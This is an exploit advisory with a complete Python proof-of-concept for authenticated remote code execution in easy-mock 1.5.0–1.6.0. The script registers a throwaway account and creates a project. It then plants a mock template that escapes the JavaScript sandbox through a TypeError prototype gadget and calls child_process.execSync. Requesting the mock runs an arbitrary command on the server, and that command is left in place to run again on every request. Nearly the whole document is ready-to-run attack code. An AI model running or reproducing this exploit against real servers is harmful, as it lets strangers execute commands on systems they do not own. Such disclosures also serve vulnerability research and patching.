Easy-Mock 1.5.0–1.6.0 Authenticated Remote Code Execution (mock-template sandbox escape)

2021.08.14
Credit: LionTree
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

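# Exploit Title: easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 12/08/2021
# Exploit Author: LionTree
# Vendor Homepage: https://github.com/easy-mock
# Software Link: https://github.com/easy-mock/easy-mock
# Version: 1.5.0-1.6.0
# Tested on: windows 10(node v8.17.0)
#
# What the script does, step by step (each step is an ordinary easy-mock API call):
#   1. register a throwaway account and log in to obtain a bearer token;
#   2. create a project owned by that account;
#   3. create a mock in it whose template contains a JavaScript function that
#      installs `get_process` on TypeError.prototype, provokes a TypeError via
#      `Object.preventExtensions(Buffer.from("")).a = 1`, and uses the caught
#      error to reach `process` and call child_process.execSync(cmd);
#   4. request the mock URL, which evaluates the template and therefore runs cmd.
#
# Operational notes:
#   * Authenticated: any self-registered user suffices, so the precondition is
#     "registration is open" (or a known account).
#   * Nothing is cleaned up. The account, the project and the mock stay on the
#     server, and the mock runs cmd again on EVERY request to it. Delete them
#     after testing.
#   * Run only against systems you are authorised to test.

import json
import secrets
import string

import requests

target = 'http://127.0.0.1:7300'
# The original author could not see the command output on the test host; the
# trigger response body is printed anyway in case the server echoes
# execSync()'s return value through the mock's `name` field.
cmd = 'calc.exe'
TIMEOUT = 15  # seconds per HTTP request, so a hung target cannot hang the script

USER_AGENT = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) "
              "Gecko/20100101 Firefox/90.0")
LANG_COOKIE = {"SSO_LANG_V2": "EN"}


def random_credential(length=8):
    """Return a random alphanumeric string of *length* characters.

    Used for the throwaway username and password. `secrets` rather than
    `random` so the password left on the target is not trivially guessable.
    """
    alphabet = string.ascii_letters + string.digits
    return ''.join(secrets.choice(alphabet) for _ in range(length))


def build_headers(origin, referer_path, token=None,
                  content_type="application/json;charset=utf-8"):
    """Return the browser-like request headers used for the API calls.

    origin: scheme://host:port of the target; used for Origin and as the Referer
            prefix. (The original script pinned both to 127.0.0.1:7300 even when
            ``target`` pointed elsewhere.)
    referer_path: path part of the Referer header.
    token: bearer token from /api/u/login; None yields the literal
           "Bearer undefined" that the unauthenticated front end sends.
    content_type: value for Content-Type, or None to omit the header (GETs).
    """
    headers = {
        "User-Agent": USER_AGENT,
        "Accept": "application/json, text/plain, */*",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Authorization": "Bearer " + (token if token else "undefined"),
        "Origin": origin,
        "Connection": "close",
        "Referer": origin + referer_path,
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin",
    }
    if content_type:
        headers["Content-Type"] = content_type
    return headers


def auth_cookies(token):
    """Cookies for authenticated calls: the language cookie plus the session token."""
    cookies = dict(LANG_COOKIE)
    cookies["easy-mock_token"] = token
    return cookies


def mock_template(command):
    """Return the easy-mock template body that executes *command* on the server.

    *command* is embedded as a JSON string literal, which is also a valid
    JavaScript string literal, so quotes and backslashes in the command cannot
    break the template syntax (the original concatenated it raw into "...").
    """
    js_command = json.dumps(command)
    return (
        "{\n 'foo': 'Syntax Demo',\n 'name': function() {\n return (function() {\n"
        " TypeError.prototype.get_process = f => f.constructor(\"return process\")();\n"
        " try {\n Object.preventExtensions(Buffer.from(\"\")).a = 1;\n } catch (e) {\n"
        " return e.get_process(() => {}).mainModule.require(\"child_process\").execSync("
        + js_command + ").toString();\n }\n })();\n }\n}"
    )


def register(base_url, username, password):
    """Create the throwaway account; raises on a non-2xx response."""
    resp = requests.post(base_url + "/api/u/register",
                         headers=build_headers(base_url, "/login"),
                         cookies=LANG_COOKIE,
                         json={"name": username, "password": password},
                         timeout=TIMEOUT)
    resp.raise_for_status()


def login(base_url, username, password):
    """Log in and return the bearer token.

    Raises RuntimeError with the server's reply when no token comes back
    (e.g. registration was refused), instead of a bare KeyError.
    """
    resp = requests.post(base_url + "/api/u/login",
                         headers=build_headers(base_url, "/login"),
                         cookies=LANG_COOKIE,
                         json={"name": username, "password": password},
                         timeout=TIMEOUT)
    resp.raise_for_status()
    body = resp.json()
    token = (body.get("data") or {}).get("token")
    if not token:
        raise RuntimeError("login failed, response was: {}".format(body))
    return token


def create_project(base_url, token, username):
    """Create a project named after the user with URL prefix "/<username>"."""
    project = {"description": "just a poc", "group": "", "id": "", "members": [],
               "name": username, "swagger_url": "", "url": "/" + username}
    resp = requests.post(base_url + "/api/project/create",
                         headers=build_headers(base_url, "/new", token),
                         cookies=auth_cookies(token), json=project, timeout=TIMEOUT)
    resp.raise_for_status()


def list_projects(base_url, token):
    """Return the project list visible to the token (`data` of the API reply)."""
    url = (base_url + "/api/project?page_size=30&page_index=1&keywords=&type="
           "&group=&filter_by_author=0")
    resp = requests.get(url,
                        headers=build_headers(base_url, "/login", token, content_type=None),
                        cookies=auth_cookies(token), timeout=TIMEOUT)
    resp.raise_for_status()
    return resp.json().get("data") or []


def pick_project_id(projects, username):
    """Return the `_id` of the project this script created.

    Prefers the entry whose `url` or `name` matches *username*. The listing is
    requested with filter_by_author=0, so on a shared instance the first entry
    is not necessarily ours; only if nothing matches does this fall back to the
    first entry (the original behaviour) and say so.
    """
    if not projects:
        raise RuntimeError("project listing is empty; project creation failed?")
    wanted_url = "/" + username
    for project in projects:
        if project.get("url") == wanted_url or project.get("name") == username:
            return project["_id"]
    print("[!] created project not found by url/name; falling back to the first listed project")
    return projects[0]["_id"]


def create_mock(base_url, token, project_id, username, command):
    """Add a GET mock at "/<username>" whose template runs *command*."""
    mock = {"description": "poc", "method": "get", "mode": mock_template(command),
            "project_id": project_id, "url": "/" + username}
    resp = requests.post(base_url + "/api/mock/create",
                         headers=build_headers(base_url, "/editor/" + project_id, token),
                         cookies=auth_cookies(token), json=mock, timeout=TIMEOUT)
    resp.raise_for_status()


def trigger(base_url, token, project_id, username):
    """Request the mock URL, which evaluates the template, and return the response."""
    path = "/mock/{}/{}/{}".format(project_id, username, username)
    headers = build_headers(base_url, path, content_type="application/json")
    headers["Accept"] = "application/json, */*"
    headers["Cache-Control"] = "max-age=0"
    # The preview request in the original carried neither Authorization nor Origin.
    del headers["Authorization"]
    del headers["Origin"]
    return requests.get(base_url + path, headers=headers,
                        cookies=auth_cookies(token), timeout=TIMEOUT)


def main():
    """Run the full chain against ``target`` with ``cmd``; prints the credentials used."""
    username = random_credential()
    password = random_credential()
    print(username)
    print(password)
    register(target, username, password)
    token = login(target, username, password)
    create_project(target, token, username)
    project_id = pick_project_id(list_projects(target, token), username)
    create_mock(target, token, project_id, username, cmd)
    resp = trigger(target, token, project_id, username)
    print("[*] mock response (HTTP {}):".format(resp.status_code))
    print(resp.text)


if __name__ == "__main__":
    main()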

